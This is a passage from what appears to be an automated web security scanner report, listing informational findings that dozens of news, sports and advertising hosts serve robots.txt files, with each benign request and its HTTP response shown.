Request

GET /robots.txt HTTP/1.0
Host: live.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=d16c24a1312b877495181a6fc42c0a51; expires=Sat, 25-Jan-2031 02:08:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:08:24 GMT
Content-Length: 244
Keep-Alive: timeout=3, max=991
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://live.n
...[SNIP]...

29.43. http://login.live.com/gls.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/gls.srf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sat, 08 Jan 2011 07:07:42 GMT
Accept-Ranges: bytes
ETag: "073d7bd2afcb1:691"
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1M53 V: 0
Date: Sat, 29 Jan 2011 23:14:16 GMT
Connection: close

User-agent: *
Disallow:

29.44. http://malexj.tk/6M previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malexj.tk
Path:	/6M

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: malexj.tk

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Resin/2.1.17
ETag: "AAAAS3M0Chw"
Last-Modified: Fri, 28 Jan 2011 13:29:10 GMT
Content-Type: text/plain
Content-Length: 67
Connection: close

# Robots.txt file for TK sites
#
User-agent: *
Disallow: /tikilink

29.45. http://malexj.wordpress.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malexj.wordpress.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: malexj.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:09:34 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://malexj.wordpress.com/xmlrpc.php
Content-Length: 267
X-nc: HIT luv 46

Sitemap: http://malexj.wordpress.com/sitemap.xml

User-agent: IRLbot
Crawl-delay: 3600

User-agent: *
Disallow: /next/

# har har
User-agent: *
Disallow: /activate/

User-agent: *
Disallow: /signup/

...[SNIP]...

29.46. http://michaelwann.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: michaelwann.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=8c2c07b5ad57597beb91d2a0dd79a825; expires=Sat, 25-Jan-2031 02:08:32 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:08:32 GMT
Content-Length: 251
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://michae
...[SNIP]...

29.47. http://mlb.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mlb.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mlb.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://mlb.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:e39"
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:38 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.48. http://msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "74cb8de98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.49. http://mtp.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mtp.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.aol.com
Path:	/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 2176
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive

User-agent: *
Sitemap: http://music.aol.com/sitemap_static_urls.xml
Sitemap: http://music.aol.com/video_sitemap_index.xml
Sitemap: http://music.aol.com/artist_sitemap_index.xml
Sitemap: http://music.a
...[SNIP]...

29.51. http://nbcsports.msnbc.com/id/41325676/ns/sports-tennis/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nbcsports.msnbc.com
Path:	/id/41325676/ns/sports-tennis/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nbcsports.msnbc.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:265"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Content-Length: 151
Cache-Control: public, max-age=0
Expires: Sun, 30 Jan 2011 02:17:06 GMT
Date: Sun, 30 Jan 2011 02:17:06 GMT
Connection: close

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

Summary

Severity:	Information
Confidence:	Certain
Host:	http://netscape.aol.com
Path:	/$\|http:/music.aol.com/radioguide/bb/$\|http:/money.aol.com/$\|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$\|http:/www.weblogs.com/$\|http:/smallbusiness.aol.com/$\|http:/www.blackvoices.com/$\|http:/latino.aol.com/$\|.ivillage.com.*/1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: netscape.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:13 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lmb33.websys.aol.com
Content-Type: text/html;charset=UTF-8
Content-Length: 28
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive

User-agent: *
Disallow: /

29.53. http://news.discovery.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.discovery.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 10 Nov 2009 15:43:39 GMT
ETag: "58b15-28-478062c86a0c0"
Accept-Ranges: bytes
Content-Length: 40
Content-Type: text/plain
Date: Sun, 30 Jan 2011 02:17:14 GMT
Connection: close

User-agent: *
Disallow: /ads/
Allow: /

29.54. http://news.sciencemag.org/scienceinsider/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.sciencemag.org
Path:	/scienceinsider/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.sciencemag.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:21 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.11 DAV/2
Last-Modified: Thu, 11 Feb 2010 21:13:36 GMT
ETag: "2f1e-13b-47f599fc2c000"
Accept-Ranges: bytes
Content-Length: 315
Connection: close
Content-Type: text/plain

User-agent: *
crawl-delay: 5
Disallow: /css
Disallow: /js
Disallow: /mt-static
Disallow: /cgi-bin

Sitemap: http://news.sciencemag.org/sitemap.xml

User-agent: Fasterfox
Disallow:/

User-agent: daumo
...[SNIP]...

29.55. http://nightly.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nightly.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nightly.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:18 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.56. http://ninemsn.video.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ninemsn.video.msn.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ninemsn.video.redacted

Response

HTTP/1.1 200 OK
Content-Length: 116
Content-Type: text/plain
Last-Modified: Sun, 22 Jun 2008 10:45:44 GMT
Accept-Ranges: bytes
ETag: "0bc261f55d4c81:1713"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:20 GMT
Connection: close

User-agent: msnbot-media
Disallow:

User-agent: *
Disallow: /StreamingUrl.aspx?*
Disallow: /StreamingUrl.aspx

29.57. http://openchannel.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://openchannel.msnbc.redacted
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: openchannel.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 02:22:31 GMT
Date: Sun, 30 Jan 2011 02:17:31 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://opench
...[SNIP]...

29.58. http://p.ace.advertising.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.ace.advertising.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: p.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:17:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:17:39 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

29.59. http://pagead2.googlesyndication.com/pagead/expansion_embed.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/expansion_embed.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 30 Jan 2011 01:24:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

29.60. http://planetary.org/blog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://planetary.org
Path:	/blog

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: planetary.org

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:47 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 08 Oct 2010 19:21:19 GMT
ETag: "c6aafa-fb-ea46e9c0"
Accept-Ranges: bytes
Content-Length: 251
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_img/
Disallow: /_error/
Disallow: /_inc/
Disallow: /archive/
Disallow: /audio/
Disallow: /cgi-bin/
Disallow: /html/
Disallow: /image/
Disallow: /Images/
Disallow: /images/
Di
...[SNIP]...

29.61. http://preps.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://preps.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: preps.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://preps.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:50 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.62. http://profootball.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profootball.scout.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profootball.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://profootball.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:9f5"
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:58 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.63. http://progolftalk.nbcsports.com/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://progolftalk.nbcsports.com
Path:	/2011/01/29/tiger-woods-shoots-74-in-farmers-third-round/related

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: progolftalk.nbcsports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 02:18:06 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://progolftalk.nbcsports.com/xmlrpc.php
Content-Length: 506
X-nc: HIT luv 45

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...

29.64. http://r1.ace.advertising.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1.ace.advertising.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r1.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:18:12 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

29.65. http://rachel.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rachel.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rachel.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 30 Jun 2010 19:46:20 GMT
Accept-Ranges: bytes
ETag: "0e5fe98c18cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:13 GMT
Connection: close
Content-Length: 151

# robots.txt file for www.msnbc.com, www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.msnbc.redacted/xml/SitemapIndex.xml

29.66. http://redtape.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: redtape.msnbc.com

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web048
X-Webserver: oak-tp-web048
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Sun, 30 Jan 2011 02:18:21 GMT
X-Varnish: 2959024747 2869871228
Age: 90920
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Disallow: /
Allow: /.m/

User-agent: Y!J-SRD
Disallow: /
All
...[SNIP]...

29.67. http://redtape.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redtape.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: redtape.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:18:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a8d6b693822a4f1e8b11eb055446adcb; expires=Sat, 25-Jan-2031 02:18:24 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:18:24 GMT
Content-Length: 247
Keep-Alive: timeout=3, max=947
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://redtap
...[SNIP]...

29.68. http://rss.scout.com/rss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rss.scout.com
Path:	/rss.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rss.scout.com

Response

HTTP/1.0 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://rss.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:d04"
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:18:29 GMT
Connection: close
Akamai: True

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.69. http://s0.2mdn.net/879366/flashwrite_1_2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/879366/flashwrite_1_2.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 29 Jan 2011 21:20:10 GMT
Expires: Wed, 26 Jan 2011 21:07:44 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 17904
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

29.70. http://safebrowsing.clients.google.com/safebrowsing/downloads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://safebrowsing.clients.google.com
Path:	/safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 17 Jan 2011 07:39:39 GMT
Date: Sat, 29 Jan 2011 23:14:08 GMT
Expires: Sat, 29 Jan 2011 23:14:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

29.71. http://science.slashdot.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://science.slashdot.org
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: science.slashdot.org

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001
X-Fry: That's a chick show. I prefer programs of the genre: World's Blankiest Blank.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Last-Modified: Sat, 29 Jan 2011 20:32:12 GMT
ETag: "15f42f-503-4d44794c"
Content-Type: text/plain
Content-Length: 1283
Date: Sun, 30 Jan 2011 02:18:52 GMT
X-Varnish: 958563512
Age: 0
Connection: close

# robots.txt for Slashdot.org
# $Id$
# "Any empty [Disallow] value, indicates that all URLs can be retrieved.
# At least one Disallow field needs to be present in a record."

User-agent: Mediapartners
...[SNIP]...

29.72. https://secure.scout.com/js/oo_engine.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/js/oo_engine.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: secure.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: https://secure.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:8ea"
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:34:40 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx

29.73. https://security.live.com/LoginStage.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://security.live.com
Path:	/LoginStage.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: security.live.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Last-Modified: Sun, 23 Jan 2011 07:23:01 GMT
Accept-Ranges: bytes
ETag: "80f8cd5dcebacb1:4835"
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSTOOL1B06 V: 0
Date: Sat, 29 Jan 2011 23:13:44 GMT
Connection: close

User-agent: *
Disallow:

29.74. http://seedmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seedmagazine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: seedmagazine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:03 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Tue, 05 May 2009 19:13:49 GMT
ETag: "2e80a8-26-14221540"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/print

29.75. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-Cnection: close
Date: Sun, 30 Jan 2011 01:24:12 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

29.76. http://suzanne-choney.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://suzanne-choney.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: suzanne-choney.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3d9913b9eddb878e863d4c9ab7933aac; expires=Sat, 25-Jan-2031 02:19:30 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:19:30 GMT
Content-Length: 254
Keep-Alive: timeout=3, max=970
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://suzann
...[SNIP]...

29.77. http://technolog2.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog2.newsvine.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: technolog2.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:44 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=e466e09e433a4d1e1987318c36645d33; expires=Sat, 25-Jan-2031 02:53:44 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=604800
Expires: Sun, 06 Feb 2011 02:53:44 GMT
Content-Length: 250
Keep-Alive: timeout=3, max=1000
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://techno
...[SNIP]...

29.78. http://thelastword.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thelastword.msnbc.redacted
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thelastword.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 252
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sun, 30 Jan 2011 03:00:28 GMT
Date: Sun, 30 Jan 2011 02:55:28 GMT
Connection: close

User-agent: *
Disallow: /_wine
Disallow: /_tools
Disallow: /_vine
Disallow: /_login
Disallow: /_util
Disallow: /_more
Disallow: /_action

Allow: /_vine/archive

Crawl-delay: 10

Sitemap: http://thelas
...[SNIP]...

29.79. http://today.msnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: today.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
